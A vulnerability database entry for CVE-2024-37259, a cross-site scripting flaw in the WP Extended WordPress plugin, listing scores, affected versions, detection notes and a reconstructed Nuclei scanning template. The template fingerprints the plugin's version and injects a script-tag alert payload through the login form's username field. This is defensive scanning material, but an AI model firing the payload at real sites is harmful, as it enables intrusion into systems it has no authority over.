CVE-2024-37259
Published: 2024-07-22
CVE-2024-37259: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended…
Priority: P1 · 80 · medium · CVSS 3.1 base score: 6.1
CVSS vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Flags: ITW · Exploit · VulnCheck KEV (exploited in the wild)
EPSS: 0.63% (45.6th percentile)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended wpextended. This issue affects The Ultimate WordPress Toolkit – WP Extended: from n/a through <= 2.4.7.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wp_extended | the_ultimate_wordpress_toolkit_wp_extended | <= 2.4.7 | — |
| wpextended | wp_extended | < 3.0.0 | 3.0.0 |
Detection & IOCs (extracted from sources)
Detection checks:
- Probe for plugin presence by requesting the readme.txt file and checking for the plugin name string in the response body.
- Vulnerable versions are 2.4.7 and below; extract the version from the readme.txt 'Stable tag' field and compare.
- The XSS payload is reflected in the login-attempt admin page; confirm exploitation by checking that the raw XSS payload appears in the body of the wp-extended_login_attempt admin page response.
- The attack vector requires an authenticated session; look for POST requests to /wp-login.php followed by access to the admin login-attempt page as an indicator of exploitation attempts.
- Version string can be extracted from the plugin readme.txt using the regex pattern 'Stable tag: ([0-9.]+)'.
Context notes:
- Exploitation requires an authenticated (logged-in) WordPress session before the XSS can be triggered on the admin page.
- The vulnerability affects WP Extended versions from n/a through 2.4.7 inclusive; versions above 2.4.7 are not affected.
CVSS provenance
- NVD (v3.1): 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- VulnCheck: 6.1 MEDIUM
GHSA
GHSA-c4x4-cgpc-c2rw: Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolki
Status: ghsa_unreviewed · 2024-07-22
CVE-2024-37259 [HIGH] CWE-79 GHSA-c4x4-cgpc-c2rw: Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolki
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended allows Reflected XSS. This issue affects The Ultimate WordPress Toolkit – WP Extended: from n/a through 2.4.7.
VulnCheck
wpextended wp_extended Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Source: vulncheck · 2024 · CVSS 6.1
CVE-2024-37259 [MEDIUM] wpextended wp_extended Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended wpextended. This issue affects The Ultimate WordPress Toolkit – WP Extended: from n/a through <= 2.4.7.
Affected: wpextended wp_extended
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/plugin/wpextended/vulnerability/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability
No detection rules found.
Nuclei
WP Extended < 3.0.0 - Stored Cross-Site Scripting
Source: nuclei · CVSS 6.1
CVE-2024-37259 [MEDIUM] WP Extended < 3.0.0 - Stored Cross-Site Scripting
```yaml
# Nuclei template as indexed on this page. Extraction had removed the YAML
# indentation, the blank line between HTTP headers and body, and the HTML
# tags inside the payload string; those are restored here. The indexed copy
# ends in the second request's matcher block (the final key was cut off as
# "internal: tru"), so nothing beyond that point is reproduced.
id: CVE-2024-37259

info:
  name: WP Extended < 3.0.0 - Stored Cross-Site Scripting
  author: unknown  # not recorded on this page; nuclei requires the field
  severity: medium
  description: |
    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
    vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended.
    Affects versions through 2.4.7; fixed in 3.0.0.
  reference:
    - https://patchstack.com/database/wordpress/plugin/wpextended/vulnerability/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-37259
    cwe-id: CWE-79

variables:
  # The indexed copy shows only 'alert(document.domain)"' because the HTML
  # extractor stripped the surrounding tags; the script wrapper is restored.
  raw_payload: "<script>alert(document.domain)</script>"

http:
  # Request 1: fingerprint the plugin via readme.txt and extract its version.
  - raw:
      - |
        GET /wp-content/plugins/wpextended/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 2.4.7')"
          - "contains(body, 'The Ultimate WordPress Toolkit - WP Extended')"
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'

  # Request 2: a failed login whose username field carries the payload; the
  # page's IOC notes say it is later reflected in the plugin's login-attempt
  # admin page. The matcher is internal, so this step alone reports nothing.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{url_encode(payload)}}&pwd=wrongpassword&wp-submit=Log+In&redirect_to=&testcookie=1

    attack: batteringram
    payloads:
      # The indexed copy lists this identical entry four times; one suffices.
      payload:
        - "{{raw_payload}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "wp-login")'
        condition: and
        internal: true
```
No writeups or analysis indexed.
Timeline: 2024-07-22 Published · Exploited in the wild